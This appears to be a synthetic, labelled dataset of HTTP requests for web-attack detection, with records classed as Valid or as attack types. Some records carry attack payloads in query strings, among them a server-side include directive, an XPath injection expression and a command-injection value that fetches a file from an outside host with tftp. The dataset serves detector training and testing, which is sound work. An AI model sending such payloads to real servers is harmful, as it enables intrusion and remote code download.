Accept-Language: t7Hch-sob, has7rrat-web;q=0.5, ro-e7rerats
Cache-Control: x6rMen='eAasCjam'
Client-ip: 44.86.112.81
Cookie: olgOdie=hjFr;wnsgd7R=24245724;lyt=3348;rannhj=ithei6M26qryem3
Cookie2: $Version="37"
Date: Fri, 28 Sep 07 16:03:47 CET
ETag: W/"@@Ao_oS1B2xROh_kXJ"
Expect: 100-continue
From: eutnTors@herbtLcsty.fr
If-Modified-Since: Wed, 18 Apr 07 19:41:49 GMT
If-Unmodified-Since: Mon, 03 Apr 06 18:50:06 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Nov 08 01:35:36 CET
Max-Forwards: 2
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="etierrat"
Authorization: NTLM YzBmbWd2bnFlbzc1YnNkbHRwdDhlbnJhbjh0dGF2cDdoQXRpY25jc3MzYXk=
Range: 396-,06-480,6-
Referer: /isSizh/pdtu/igmybaul/lwaig/gimS7rdo.tiff
TE: gzip,deflate,trailers
Trailer: Pragma
User-Agent: 5mis/8.2
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 956x541
Via: HTTP/8.3 89.191.61.83, 9.5 www.yathI.shtml:1996, 1.7 www.earcdt7.jpg
Transfer-Encoding: deflate
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 701 7.138.6.62 "rfLcImnf" "Wed, 28 Jan 09 11:52:05 UTC"
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 6495346475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16133
Start - Id: 10593
class: Valid
GET /HennhOserZoe.sh?rmtdblhlUhmbn=761433348&Sexec7nsm_IVHU=6&0epeehle3uaia=3&e2mett7=icWrTSru&ieetwBj=tyTU9kYBaB9&uaqr=54 HTTP/1.1
Host: 66.54.212.133
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-8, euc-cn;q=0.6, x-mac-cyrillic;q=0.8, windows-1250, euc-jp;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=768
Client-ip: 67.125.101.199
Cookie: etwn8aoT=rtjpeOeee;ceiyau8AeHedb=mai
Cookie2: $Version="6"
Date: Thu, 30 Oct 08 11:42:23 UTC
ETag: "7hG8JcmZ3.YQDwO.j"
Expect: 100-continue
From: suIgc@irs9up.be
If-Modified-Since: Sat, 13 Dec 08 10:47:38 UTC
If-Unmodified-Since: Mon, 01 Nov 04 02:56:06 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 31 Jul 07 07:49:35 CET
Max-Forwards: 97
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: NTLM YUdyVGlhaDVsYmVoMGQ4Z09oMWVhaDdlMXdhZWl5dDNsZXo5OHlz
Authorization: Digest response="B8EcaEBF6Ed6d7CAe7faa980341dcec5"
Range: 22913-,152745-,7345-
Referer: /cu1tea/tdys.jsp
TE: trailers,deflate;q=0.0,chunked;q=0.0
Trailer: Authorization
User-Agent: Mozilla/7.6 (compatible; Konqueror/6.0; Win 9x; dommd; qLYEtx; tEtchzu9tl)
UA-CPU: x86
UA-Disp: 4542,2926,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 170x2008
Via: 2.1 236.235.192.72, 1.1 163.175.105.153
Transfer-Encoding: lcajqE
Upgrade: yEh/3.1, isdw/4.5, nyc/2.7, q0n/0.1
Warning: 834 www.tef1xm.html "Tynnwvdgbhlmdt4" "Sun, 05 Mar 06 10:41:18 UTC"
X-Forwarded-For: 170.174.211.23
X-Serial-Number: 340706
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10593
Start - Id: 17845
class: Valid
GET /9_AuDnFXZfIM/oYWPbp/p1-P./sJL/tS7X.21O28t5aMhTs8_4/8olMfdvwUkWLJ@Z.jpg? HTTP/1.1
Host: www.pnicec5my.biz
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 199.143.63.242
Cookie: egeioRtnhih9=3;dasreap=5592510;px5m=855650164
Cookie2: $Version="0"
Date: Wed, 03 Sep 08 08:38:48 UTC
ETag: "6iCjJLRY-a6HuJ-"
Expect: 100-continue
From: lrnihbje@e0fdWo.be
If-Modified-Since: Tue, 17 Feb 04 03:11:22 GMT
If-Unmodified-Since: Mon, 24 Sep 07 20:03:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 812
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/cied43/n2tr/gSdoo5nw.php3
Range: 5-3
Referer: /9fse3.nsf
TE: trailers,gzip,trailers
Trailer: Via
User-Agent: Mozilla/5.9 (Windows; U; Win 9x 6.3; ae-o2; rv:6.9.8) Gecko/83161282
UA-CPU: 68000
UA-Disp: 8443,978,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3160x969
Via: HTTP/5.4 59.232.70.228, 0.0 98.41.122.43, iaror/6.4 www.Apaq.png
Transfer-Encoding: identity
Upgrade: Eetls/7.0, htl1/6.1, an0e/5.2
Warning: 251 www.imAynCn2.html:1876 "wyu5ls5teb2nziefeO" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 164483377111827
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17845
Start - Id: 44714
class: PathTransversal
POST /baCeXVc/e0xm022w19Af2fMpd/nVQIzJ.cJk/ebtEp/owseatnt9lRaoe.swf? HTTP/1.1
Content-Length: 259
Content-Language: mH,i9yi8u,Riejq
Content-Encoding: deflate
Content-Location: http://www.rrOms.st/rhiica/toe6oo/emthEAne.php3
Content-MD5: RXhlYjVyZWxpYW1paVRyag==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Mar 07 01:51:39 GMT
Last-Modified: Sun, 28 May 06 11:43:50 CET
Host: www.S59o.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.5, compress;q=0.6, deflate;q=0.5, deflate;q=0.0
Accept-Language: eee-yrk;q=0.9, eriyod-ionsng, iaeho-8n
Cache-Control: min-fresh=7345
Client-ip: 230.63.102.101
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="11"
Date: Mon, 02 Feb 09 10:02:59 UTC
ETag: "plt73QUn8kWDZLJVBbM"
Expect: 100-continue
From: ntofsxe@nilrhaih6.gov
If-Modified-Since: Thu, 10 Feb 05 01:59:17 CET
If-Unmodified-Since: Tue, 15 Jul 08 18:58:42 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9097
MIME-Version: 0.7
Pragma: naqRi='ji'
Proxy-Authorization: o7lshm rootirq=tt9s
Authorization: NTLM YXNlbDZobmU1ZXFhbHNrbWVleGhubVNhaGhlbHduRDJuY3dudmloZUQwZ3gzcjA=
Range: 8542-,-709
Referer: http://www.dpwgw.ch/et2Eakl/ttrem6.mpg
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 2.6; 6l-os; rv:0.7.0) Gecko/20657732
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: 2.0 www.lwretn1.jpeg, nfrR/2.0 www.rseer.html:02809, 0.5 62.95.39.95:45
Transfer-Encoding: ttmwo; whnei=IauLn8
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 661 215.46.210.222 "cofmecp7ldtwwo78Ra" 
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tay9ymlhclaqe=cta window.opentei&sjbud8vebn=file:///i:/lsE3e/rrdm/ho6htn.xml&aoinmNEot=troEe&ty7qairdrvAaeih=19831561&UiiorEZqandfcf=3ZO4sQL_&p6bcmtttglfe=5185&ot=h8uhdEZj6&i2une=dhrhAfr&syUrqmhtggiE=dY@Ywq5LX4N&hdTiehpi2gt=9y oHud;olfbWia

End - Id: 44714
Start - Id: 18909
class: Valid
GET /nnmblh5pJO5JM/rRF@aiN-ocq-Zf-4hne/ttovrtdeasied/tX/dZVvaY_/sDJf1Nw/ipq0T@RT-XWV4Yh2d/eioelst/a9tiiINtsidgOyjd.tiff? HTTP/1.1
Host: www.lsne.st
Connection: keep-alive
Accept: audio/basic, application/postscript, text/plain
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: wda-auy1a;q=0.4, e-n;q=0.7
Cache-Control: s9uuwon=jfps
Client-ip: 166.177.25.206
Cookie: vIQeVL=izaldsss2c517tr;sPU6XOv0A5Ys=23791716
Cookie2: $Version="0"
Date: Thu, 18 May 06 07:29:15 CET
ETag: W/"jbXEp63hl0loQjH"
Expect: leet=odiaciA;rke1x
From: yjsS@orU9r.uk
If-Modified-Since: Tue, 28 Mar 06 04:52:38 CET
If-Unmodified-Since: Wed, 21 Apr 10 11:36:11 GMT
If-Match: "a@b2WkLAFKSQTaWK"
If-None-Match: "xP2Ogq1WPNqI2sd"
If-Range: Sat, 29 Oct 05 10:37:15 GMT
Max-Forwards: 3
MIME-Version: 9.7
Pragma: avd='tncbbwi'
Proxy-Authorization: Digest nonce
Authorization: Basic YnRybTk6d21pczRwYw==
Range: 3104-33,76-
Referer: http://fDemaOnB.de/oeaeiecl/tfteeinp/ocG7/buatq.css
TE: trailers,deflate;q=0.5
Trailer: Expect
User-Agent: Mozilla/9.5 (X11; U; Solaris 6.4; gn-ov; rv:3.4.4) Gecko/57572968
UA-CPU: Sparc
UA-Disp: 7305,2751,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 905x897
Via: 0.3 www.i4ll.shtml, 7.4 125.66.122.21, 0.2 www.shrE.shtml
Transfer-Encoding: compress
Upgrade: eRaba/1.6, mmqn2/8.0, cwzoea/3.0
Warning: 591 www.Inocpwr.jpeg "jhrOCtrecdie2dm" "Sat, 02 Aug 08 12:29:30 CET"
X-Forwarded-For: 197.169.87.183
X-Serial-Number: 27260320301
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18909
Start - Id: 17201
class: Valid
GET /tFKcLQVTBEZTbu/3cucFjMwNT5JTPr7rgR.dll?aq0tnohd94=oshtMtoauhjtaeren&oGetiOt1=Lf&hvejsi=e%27nph-trmmaileo&mAi8ho7B33sdbta=09847&Tce=191898&re=execnynHptlCun5sd%29n&td7m=ovoehrode1t4y&lN7ia3lextectse=ae5sox2st9ti9ohee&hl9x=a%3BANe&Stnitehszd3si=+s HTTP/1.1
Host: 41.47.26.202
Connection: close
Accept: */*
Accept-Charset: windows-874
Accept-Encoding: compress;q=0.9, compress;q=0.0, deflate;q=0.0, identity
Accept-Language: *
Cache-Control: ngDe=6ah
Client-ip: 106.60.218.207
Cookie: wyeiiLxnshno=k1MZZj@7a1R;1ttcrnaf2nrTt=1;hlezhtr9eltnt=tlOn0str;7Yyx2V.Z9ls=eosh;vtyoslhtEwSa=mo
Cookie2: $Version="62"
Date: Sun, 15 Oct 06 02:07:53 CET
ETag: "luwC8vJmsCbp7EYXytg"
Expect: 100-continue
From: esabrd@aecmV.uk
If-Modified-Since: Sun, 21 Sep 08 08:20:50 UTC
If-Unmodified-Since: Fri, 07 Dec 07 13:49:23 GMT
If-Match: "EnkZewFT08IBemf"
If-None-Match: *
If-Range: "-VpQ1PzWeyX0zHr9qAF"
Max-Forwards: 2
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: dRini wnbheet=snah
Authorization: dbrep hi5aie=ghlevaln
Range: 0678-
Referer: http://www.rdttl.st/ebhrea/aioM/hSyOs.swf
TE: gzip;q=0.3
Trailer: Max-Forwards
User-Agent: sOtysi/2.4.9.4.8
UA-CPU: PowerPC
UA-Disp: 150,488,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 987x645
Via: FTP/3.8 www.tsdW.js:58549, FTP/3.7 38.241.22.200
Transfer-Encoding: compress
Upgrade: Rtse4/4.8, sws/4.3, Oel/3.3, codm/2.9
Warning: 652 172.163.128.242:14057 "meiaHl" 
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17201
Start - Id: 39419
class: SSI
GET /sFn-hWu-iaPaV.EnTx/opuOmZm0FRGxJR/d6j3wV588Z/tmxdalEnn3gene5b/tX3XL6K/tS7z15p.@O0rpV.dll?tkRl1qi=117&eerci2estei=na-jTNtYqEra&t1acuIpntdu=asxahalulsdets&rxeoeuesmArks=mibtDuueyokosdhvl&ineyeh=j0dmm8g&etz7dngm=1574&gissbdhhCAett=yp5aegaiav&Jtmp4XET.g2=oIo&1Gy2kXa2dQ=ilse&eet=dis&ro3ae=ENe+Ocolocationlcannh&BgQKoc=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&eddx=ati%29i HTTP/1.1
Host: 32.6.84.52:243
Connection: vrNtrltw
Accept: image/jpeg, video/*;q=0.1, text/plain;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: jee-rato5f
Cache-Control: no-cache
Client-ip: 128.199.124.139
Cookie: ngtnsC=t;dcslrmourmfybhi=vm;nfUws=difoatdeonsiasA;LG5bWKsmJZt=d5nmS4eN7OW;4uxT=ht&@se 
Cookie2: $Version="2"
Date: Mon, 14 Nov 05 03:59:50 GMT
ETag: W/"EqD@suDSZ-6kzkU3OMMy"
Expect: 6rdH=iio9e;n23rrc
If-Modified-Since: Mon, 22 Oct 07 01:31:11 UTC
If-Unmodified-Since: Fri, 01 May 09 17:11:13 UTC
If-Match: "CyQfY5W.72ojlaLb8n"
If-None-Match: *
If-Range: "WPlAulL9yJ9KPNp"
Max-Forwards: 7763
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM dHBldWZPb21zaGR5T25oZWlvdWhyZXNvZXRld2llaGFsYzI=
Authorization: Basic ZXk5ZW86b3lhb3J1
Range: 02-,96-
Referer: http://nu8C.gov/aSiaabe.dll
TE: trailers,trailers
Trailer: Upgrade
User-Agent: ahr2cktticsAhwii
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3896x417
Via: HTTP/8.4 46.39.162.161:50
Transfer-Encoding: gzip
Upgrade: oonp/1.0
Warning: 911 148.86.166.125:8448 "aOi1" 
X-Serial-Number: 599135486061
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39419
Start - Id: 23954
class: Valid
GET /dJr4/nfS/nDNYcUSorIbJ/uFsIuin4/_iOmg-0a/IjB@uz3sQaz9cm/hHQM/7W3Vt4UsD@b6Nv7dKzUT/jtnbimweatc/aag8m_/4nah/i2Vq.aspx?tbethlstd=std&s3sSnEr=e%3Bys1&shOf8V6_KR=7227163&ltPt=ieo HTTP/1.1
Host: www.riyles.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: a='h1tydeeT'
Client-ip: 237.51.196.149
Cookie: wSyet3acqogrM=r4w5yjyzQ-xq;tttctabLNraw=734252;rsotag=antroqso;riaiacker=4535;an9=-
Cookie2: $Version="843"
Date: Fri, 12 Mar 10 12:33:37 GMT
ETag: W/"FvkHj8C9bQkH4Xda@"
Expect: teh2c=f8EkwEre;8i8hk9
From: hhia@RXgEevnUs.cz
If-Modified-Since: Mon, 21 Apr 08 08:26:31 CET
If-Unmodified-Since: Wed, 17 Oct 07 13:26:31 UTC
If-Match: "zHsx@-E9m0owMMpaWl"
If-None-Match: *
If-Range: Sat, 17 Oct 09 19:58:55 UTC
Max-Forwards: 4010
MIME-Version: 9.0
Pragma: 9='t8awt0'
Proxy-Authorization: Digest username="hihrci"
Authorization: Digest cnonce="oqlzc"
Range: 074-7647,9-,-3
Referer: /ugeehsu/gySg4d/lrtgAiEn/Uoexdt2d/esqsop.mpg
TE: chunked;q=0.6,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/7.7 (X11; U; Linux i586 5.2; lt-zx; rv:9.0.5) Gecko/61444272
UA-CPU: StrongARM
UA-Disp: 862,451,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 916x209
Via: 3.2 120.118.25.127
Transfer-Encoding: identity
Upgrade: aehr/3.4, ioW/9.5
Warning: 838 126.126.166.93 "ueEslae" "Tue, 30 Nov 04 21:59:39 UTC"
X-Forwarded-For: 16.106.202.140
X-Serial-Number: 149109156633944
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23954
Start - Id: 7963
class: Valid
POST /hj0etAfgzMisSth/osfCssiq/eX@C5Ag56.9RLkFUdwpO/7DdL.execv/PDwhereshoGZJ/hgonleanC.gif? HTTP/1.1
Content-Length: 265
Content-Language: jnoee,9tmeea
Content-Encoding: gzip
Content-Location: http://www.uie2.it/ehn1ion/lturiIEs/3eeay.tiff
Content-MD5: em9sYUZvbGFpOXUxOHRvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 May 07 01:59:53 UTC
Last-Modified: Thu, 08 Feb 07 02:00:38 GMT
Host: www.1lam.de:80
Connection: keep-alive
Accept: audio/basic;q=0.7, image/gif;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e6-asr;q=0.5, dktdNont-f;q=0.6
Cache-Control: max-age=167
Client-ip: 244.62.195.136
Cookie: rqrF5uGK1=m8ccS23o;openDh14gZ05EZ=rs0;ata2kn=2;bmerbctonnatth=5 t dkh?0vvE p
Cookie2: $Version="0"
Date: Fri, 12 Jun 09 17:46:26 GMT
ETag: W/"OtIb4q6xgkVt7XZZXA"
Expect: 100-continue
From: uyh9nAn@dvblu.it
If-Modified-Since: Thu, 13 Oct 05 18:17:06 UTC
If-Unmodified-Since: Tue, 06 Mar 07 08:26:41 GMT
If-Match: "jynFQ9LyySZqiZ26BncJ"
If-None-Match: *
If-Range: *
Max-Forwards: 55
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic aWVvSW9hYTpyejNtYXNndA==
Authorization: Digest username="Asf3axr"
Range: -57827,6032-4
Referer: http://www.ttdd.biz/A8t7y/eceea/heeiie/ooblOot.jsp
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/5.4 (Windows; U; Win 9x 2.6; or-qe; rv:5.0.4) Gecko/42582581
UA-CPU: MIPS
UA-Disp: 250,771,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 094x6003
Via: 9.6 www.bvnnex.js, HTTP/0.8 101.80.146.183, 0.3 21.6.48.1
Transfer-Encoding: gzip
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 88.220.41.73
X-Serial-Number: 56493
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

1T_T2BdZ=6sh3&aecartpltbl=6&eeNh=c-SOwY&htw=ehei&7@Q@varBLe=anetcatnfnpsy debodyesamobjecteih&hr0xea=ol]O sskeodadonino&bednreeeslnl=1&saftprthhh=7603&noR=1227384&lsm5mI=pTenn9ulmhdtiSL&Ntsalln=sru&awt=657064&epe=0sfDQpkYN_3&noj=x&tc5olaqoioSl=iTsoeAE@teybsqoni

End - Id: 7963
Start - Id: 43434
class: OsCommanding
GET /r45eott/tlcinbqfqn52vq9/3YXP-/rpd2aoe9r44a/qwindow.openDoCI/NI9SIgRechowF/h03Hk5009OFKbC/7tsceivdkZwtinh/nt0eesequaoedya0st/asq3ao8rsafiou.mspx?lODsmIR=%27+%3B++++tftp++++-c++++get+++www.maolie.com%3A%2Froroseic.tar&OPEztPposition.j=q0Be&rmyhpe8OioniA=4_7X-cgPoBw&ea1uueer=f2bh%26epstdinpa&ARCjWXFa=s3%40-zUAtZ HTTP/1.1
Host: 155.227.86.174:93
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 1tlo-zgsnpnmz;q=0.3
Cache-Control: dEr='8u2'
Client-ip: 230.11.35.165
Cookie: jrYhtpass36MphpsystemLK=5727537
Cookie2: $Version="3"
Date: Mon, 14 Aug 06 10:27:06 GMT
ETag: "UylSwj-j1YsBiH-"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Sun, 19 Feb 06 18:23:53 GMT
If-Unmodified-Since: Wed, 07 Nov 07 11:37:18 UTC
If-Match: "kiqglVPP@sCFdFE-"
If-None-Match: "5yN@qadtWaSIwcNLNoi"
If-Range: Tue, 09 Jan 07 21:00:41 GMT
Max-Forwards: 1
MIME-Version: 4.0
Pragma: hmpeop=ernonse
Proxy-Authorization: Digest realm
Authorization: Basic aW1vc3RkNnU6cFNldTk=
Range: 89-,6-,2-
Referer: http://reUk5.gov/dsai9ye.pdf
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.9 (Machintosh; U; PPC Mac OS X 0.6; ep-ze; rv:8.7.7) Gecko/90789821
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: uwatc/0.4 www.le8sodo.html
Transfer-Encoding: ebnipp
Upgrade: e2idw/6.5, 2eabf/4.4, hean/1.8
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43434
Start - Id: 49410
class: XPathInjection
GET /nUQtgpRmMKHP9Y/seToleo3e/eXyY9S2/ifyzaRkneanxfc3l/6Z01@GqUT07J06/Npw2eb5tuoL/7sirg4entnsuep/ezl0peuLwhtpirt8ce/iXpbWu/lSuuFaoHaAxe.exe?JHBKsY7=%28i++%3C++++count%28rut%2Fchild%3A%3Atext%28%29%29+++and+++++j++%3C++++count%280et%2Fchild%3A%3Acomment%28%29%29++++and+++++k+++++%3C+count%28ir6el%2Fchild%3A%3A*%29+%29 HTTP/1.1
Host: 153.74.6.212
Connection: iene
Accept: audio/*;q=0.3, video/mpeg;q=0.3, video/mpeg;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: compress
Accept-Language: t1d-eqbai, c-U;q=0.8, 18lxpsio-tysme;q=0.1
Cache-Control: no-cache
Client-ip: 86.141.178.217
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="677"
Date: Sun, 21 Feb 10 20:46:00 CET
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: a1tnai
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Fri, 22 Dec 06 12:56:08 GMT
If-Match: "J1YUKMPgkQ8NIYrH"
If-None-Match: "BkD6DJWham6PHF.ID"
If-Range: Thu, 08 Oct 09 06:54:41 GMT
Max-Forwards: 41
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic bmhvaW9vOnR0bm9zdTY=
Authorization: o6hk nUnoo9=kdsnx
Range: 708062-
Referer: /mownSjo.mpg
TE: trailers,gzip
Trailer: Range
User-Agent: jih3IytFsaoro2aLTh
UA-CPU: StrongARM
UA-Disp: 7200,5804,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: deflate
Upgrade: dec/5.5, 4kklt/1.7
Warning: 259 181.39.207.59 "lyfafwp21tof" "Tue, 30 Mar 10 05:45:15 UTC"
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 37054990
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49410
Start - Id: 15780
class: Valid
GET /mlaraeJ/s@JWlicK1/t9u9m6Kr_bNfmT/V7uUnode.css?eenmr=eiA&drUwuAc8tn5nhe=iaPtuy%25u+&7eJgRP=e&iwo=s%244&WVwhereRVD=059632741&ean1hge=u4xWakTj&ZsAPyMYuI0=pinwe8iynle HTTP/1.0
Host: www.myxaneals.fr
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-10646-ucs-2;q=0.8, windows-1253
Accept-Encoding: *;q=0.6
Accept-Language: ftsmygn-d;q=0.8
Cache-Control: no-cache
Client-ip: 58.169.9.29
Cookie: io=arqg1a91J_De;teessu4t=(=yse;ye8=9y14o0b
Cookie2: $Version="20"
Date: Fri, 03 Dec 04 19:07:14 CET
ETag: W/"BcuWa@ss_RgUyLzqp"
Expect: 100-continue
From: ue8iwlO@tint459.com
If-Modified-Since: Sun, 16 Apr 06 11:06:01 GMT
If-Unmodified-Since: Tue, 31 Oct 06 16:19:36 GMT
If-Match: *
If-None-Match: *
If-Range: "SWWdEzGjV8H1kQAd"
Max-Forwards: 884
MIME-Version: 4.2
Pragma: ioal='yMiveoe'
Proxy-Authorization: Digest qop=auth
Authorization: Basic cmUzdG9pOmJhTmJ5cg==
Range: 56833-
Referer: /eahgiham.tar.gz
TE: deflate;q=0.9,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: 4ue6peaAdcn3ex5mes
UA-CPU: StrongARM
UA-Disp: 996,4462,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9100x614
Via: FTP/8.9 15.63.90.102, HTTP/2.1 www.llnrrr.htm
Transfer-Encoding: gzip
Upgrade: tlub/4.7, hksiTB/4.2, jtoi5n/2.3
Warning: 404 124.90.161.164:454 "uesttf9iRtd" 
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15780
Start - Id: 1145
class: Valid
GET /rjZ3cY.@YpOqKBpKNMgs/lwO7kMS6voWN_diULl/gia35tx7irrhneynayt/dQH/6n/inhkuFHhy2s53fialST/le254nmeooi/9EkP2tubF/7ocPV1bn7GdFuejE5.tiff?tjotOsSo=noahoV1cae%25as HTTP/1.0
Host: www.Iuem.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.3, x-mac-greek
Accept-Encoding: 
Accept-Language: k1-MTActbeT, ct-2tmniny5
Cache-Control: no-transform
Client-ip: 167.142.168.152
Cookie: ze=abMkmaB.ch;edah6Ito=n3O1vcc;egna=x onoilewhere;ibcdtd72og7tacw=qO1m;teottu1o=rrcir;oiahkk4ee=asFndaob W
Cookie2: $Version="6"
Date: Wed, 23 Nov 05 04:34:51 GMT
ETag: "GZBpFHX3VLJ_hb-Gbk"
Expect: r1xhc9ql
From: 7nAao@xchnNanrsu.be
If-Modified-Since: Tue, 27 Nov 07 16:21:36 UTC
If-Unmodified-Since: Sun, 15 Aug 04 11:50:50 CET
If-Match: *
If-None-Match: "joAF2UyOgVK9xUNIt86L"
If-Range: "AySOfoMQcrE5gcx"
Max-Forwards: 3
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest username="neou"
Authorization: vehwi8 ruag=tvaf6e
Range: 6-
Referer: http://www.un5n27a.org/nttse/z85Dnsge/iRee89d/Nugde.pdf
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: eC@Fd1vHF http://www.eatne.de
UA-CPU: x86
UA-Disp: 111,7924,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2688x3357
Via: 9.6 www.Qsst.png, 1.1 197.87.119.232
Transfer-Encoding: deflate
Upgrade: nah/6.7
Warning: 320 www.heethnz.jpg "deaI" "Tue, 17 Aug 04 13:45:02 UTC"
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 2559781115127
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1145
Start - Id: 13018
class: Valid
GET /oeoeEclersaeMeI.cfm?eeimhbsn=rhrroupdate5aal6w7&90mvbscripttxtermmw=2bater4OnSttBsa&adhfOeiet=egUduSopgcfr0+&eeh1dIV6Eazr=genzdacEoRusieI&tdzAso=eYN9np0C&zs0folhdah=m1gHEqgj&xi1eifq4=her0a%2Bst-ru&rllrheo8hrmkjb=8&rronndtkreaa=lhar&eeowrfne=l2NY3Cj&eeqexiaRWmt=htacces+%5Cfwget&bR0MVCs=993979&rduceCriim=oQBC&tenoitysut=6140861 HTTP/1.1
Host: 32.168.198.44:0
Connection: 9eNeiti
Accept: */*
Accept-Charset: gb2312;q=0.1, x-mac-chinesesimp
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: iuiwo5='dcrish'
Client-ip: 82.22.221.79
Cookie: tbpoiSe=94400012;oP7Y4ZG9aD=uetontdsftlcj;inCrys=eiooshSLcteetd9d4a;pmtsotginlK=sc4GNrqVH44Y
Cookie2: $Version="104"
Date: Sun, 20 Jul 08 01:48:02 CET
ETag: "6FXq@zy2y4TF2@wA0@3v"
Expect: 100-continue
From: hhrsnmqd@cyrn.com
If-Modified-Since: Sat, 20 Jan 07 24:01:51 UTC
If-Unmodified-Since: Sat, 13 Sep 08 16:56:51 GMT
If-Match: *
If-None-Match: *
